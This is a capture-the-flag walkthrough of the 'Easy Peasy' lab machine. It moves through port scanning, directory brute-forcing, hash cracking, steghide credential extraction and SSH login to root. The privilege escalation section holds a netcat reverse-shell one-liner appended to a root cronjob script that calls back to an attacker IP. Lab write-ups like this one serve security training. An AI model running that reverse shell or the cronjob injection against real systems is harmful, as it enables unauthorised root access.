# Easy Peasy ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0STs_izmAtgZ8NL4L%2F-Mc0So3sFHDvYzE6o8sv%2Fimage.png?alt=media\&token=da50f97f-10e3-4f53-8eff-97348de8bbc0) ## Reconnaissance Initial nmap scan to find all open ports ``` nmap -p- -T5 10.10.53.168 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0Vce88L1uCBbstAtY%2Fimage.png?alt=media\&token=076d7841-a516-4214-8ee6-8a58658b5d8f) There are three ports open ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0VtlciQrUiu1p3tRC%2Fimage.png?alt=media\&token=b954bafb-61bd-4f46-a59d-d847f6b29674) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 80,6498,65524 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 80,6498,65524 -oN nmap 10.10.53.168 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0VniToMMzLPupJHPZ%2Fimage.png?alt=media\&token=c8fbe632-5bfb-4f7e-8b46-f46654ce2261) The version of `nginx is 1.16.1` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0W0X-2_3HbPkcqu-g%2Fimage.png?alt=media\&token=747ff579-a618-4f3d-9a4a-e86e35dd4459) Apache is running on the highest port ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0WCus0VHTQLErg99d%2Fimage.png?alt=media\&token=5b564e0f-98e9-40e9-9b3d-1da088ef2b4d) ## Enumeration ### Port 80: HTTP Lets visit the site. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0WSbeHnPR6lIk1Rjp%2Fimage.png?alt=media\&token=76912390-4463-41be-b1d7-275849e48f29) There is nothing interesting in the links provided and in the source code, lets run `gobuster` to find hidden files and directories. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168/ ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0_T3559PexdYBvioy%2Fimage.png?alt=media\&token=c84dfd06-ff80-4943-9eb2-079b3f7626da) Looks like we found a directory, lets run another gobuster scan on this directory while we explore this one. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0aJUtiMW4fSEG1eAI%2Fimage.png?alt=media\&token=e1ca3607-8c29-4407-b980-ccb15895427d) We found another directory, lets visit both these pages. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0b16tfZUeOGKaLu7Q%2Fimage.png?alt=media\&token=ba9788da-a7a0-4752-b607-37d1988f0fc6) There seems to be nothing, lets go to the whatever directory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0bWbaufe4QjD6ID0c%2Fimage.png?alt=media\&token=a8353c92-00a5-4a92-afe4-5327a02c4957) There is nothing on the page, lets look at the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0bbJdFbytJU2KTtqA%2Fimage.png?alt=media\&token=f024bfbd-dbce-4268-a12f-2e14979a5da4) We have a hash, lets decrypt it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0bupx9jVpT1UmWQPB%2Fimage.png?alt=media\&token=b9a25a19-fff2-4274-b574-275cd79bd6fe) We have the first flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0c0saglOtYfmozSmV%2Fimage.png?alt=media\&token=47cf3206-235b-412b-8c3a-0528a355b313) ### Port 65524: HTTP Lets visit the site ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0XQJIv29IRgEWTDBo%2Fimage.png?alt=media\&token=8d0ad7e2-1864-43f8-abf6-b57b338c8ba8) Its a Apache 2 default page, scrolling down a bit, we find flag 3. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0a-Xsw6kpICY-EZ4p%2Fimage.png?alt=media\&token=4af9f0e9-b1af-40d6-acee-a5c8fa75e77f) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0aFB9fCRhaeqWKFBO%2Fimage.png?alt=media\&token=eb4ab5d5-6351-4b20-8a1c-9068542daedc) Lets run gobuster to find hidden directories and files. ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.53.168:65524/ ``` While gobuster is running lets check the `robots.txt` page, we find some interesting information there. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0Ya9Nmg8oF3rtODiW%2Fimage.png?alt=media\&token=bf161e6a-4f43-4adf-9c7d-bc82b82fa820) This looks like a hash, lets try to crack it. Lets first try to identify what type of hash it is ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0afKh2hnSZxY7rDAi%2Fimage.png?alt=media\&token=5de97a97-afaf-4b05-9004-2e69ee4c3ec0) Its a MD5 hash, now lets crack it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0amGHgUFI2jrNN_yU%2Fimage.png?alt=media\&token=3a397a1f-d56e-47d3-937f-aeaf2c22ee6d) And we have the second flag. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0arCjEhmJKEEU4ZkG%2Fimage.png?alt=media\&token=960af27b-b2e5-4f02-bd50-88bffa19a068) Looking back at the default page, we have something else in the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0cysGg96X7ZJsMl33%2Fimage.png?alt=media\&token=5dad6218-7103-451a-a185-652f9b8513ef) Another hash. Lets crack it ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0dFJ5MAl_ILR1JBtu%2Fimage.png?alt=media\&token=44579962-98ac-484f-9872-b5bafcf5a978) Its another directory, lets visit it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0dP0pINuVK6KsF9Ys%2Fimage.png?alt=media\&token=2a3f3ac7-e2f9-4aeb-a0d7-e42025726cd4) Its a page with binary code image, lets look at the source code. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0dkuCPnTVV6915Yff%2Fimage.png?alt=media\&token=f4a6d76e-dd0c-46ab-a2a3-a2ddb99b7f05) We have a string, lets try to identify the hash. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0e3p3sgaB9rZ22LC5%2Fimage.png?alt=media\&token=1e742376-f8be-460b-9c26-57862a705979) Lets crack it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0eeFx-6wRfq96s7ZO%2Fimage.png?alt=media\&token=0fe4c9e9-e5a3-419c-ac97-030eae2304c8) Looks like it is a password Now lets download the binary picture and see if there is anything hidden in it using `steghide`. ``` steghide --extract -sf binarycodepixabay.jpg ``` It is asking for a password, so I used the one we just found. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0eqwfqXEI7a-ocPYc%2Fimage.png?alt=media\&token=a2cd9550-233c-42ed-966b-fdc4a9e1957d) We found a text file, lets read it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0ewJCSTf4A_GU6zk-%2Fimage.png?alt=media\&token=297d2903-e63f-4d56-a554-b890649ab73b) We have a username and a password in binary, lets decode it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0f5re_tIXRJu74xz6%2Fimage.png?alt=media\&token=732508ed-db0f-4e31-88e2-f55c964863c5) We found the password, lets login through ssh. The ssh server is running on port `6498` based on our nmap scan. ``` ssh -p 6498 boring@10.10.53.168 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0UEgKWpdQES8qN5bb%2F-Mc0fZ3EIpf_GpdvJCfR%2Fimage.png?alt=media\&token=7e08d0ec-1bea-4ceb-8cb0-53d41c66a4c8) We are logged in. We can read the user.txt file, but it seems to be encrypted, so I will leave cracking it to you. (Hint: CyberChef and ROT 13) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0ftJgzYZjyt_bC-Ef%2Fimage.png?alt=media\&token=785a1bbc-47ba-4442-a105-cccb38ebc886) We can also answer all the other questions ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0gCt8wWPk_GuT9A0r%2Fimage.png?alt=media\&token=fc12069b-4b91-4eb1-9104-6457fadee46a) ## Privilege Escalation As the room had cronjob as one of its tags, I looked for `.sh` file in the system that belonged to the user boring. ``` find / -type f -user boring -name *.sh 2>/dev/null ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0h9-8tC0Wk9tvZpQA%2Fimage.png?alt=media\&token=fd719af4-1170-4d4a-903a-2a7dff16c188) Looks like we have a file, lets look at it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0hGHMsk4AuIqkXXuA%2Fimage.png?alt=media\&token=e0e8ad61-aa05-485b-aa0a-8ea2a4041509) It says it will run as root, so why don't we echo a reverse shell into the file to get a shell as root. ``` echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f" >> .mysecretcronjob.sh ``` Make sure to change the IP in the command and start a netcat listener ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0hbnCw6aoGbnjb6ku%2Fimage.png?alt=media\&token=af779516-ac2d-4108-bcc7-6a5a1537bab6) Once you echo the command into the file, the contents of the file should look like this. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0imnhRimz9gZngqK0%2Fimage.png?alt=media\&token=9608776b-c7e7-4b40-a4df-aee02da63fab) After a while you should get a shell as root ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mc0fbuK73Tihh1ODO8m%2F-Mc0iBpPvHcu4a4mgNQl%2Fimage.png?alt=media\&token=3f370b52-3a7a-44a6-b53a-9340ec5ae83f)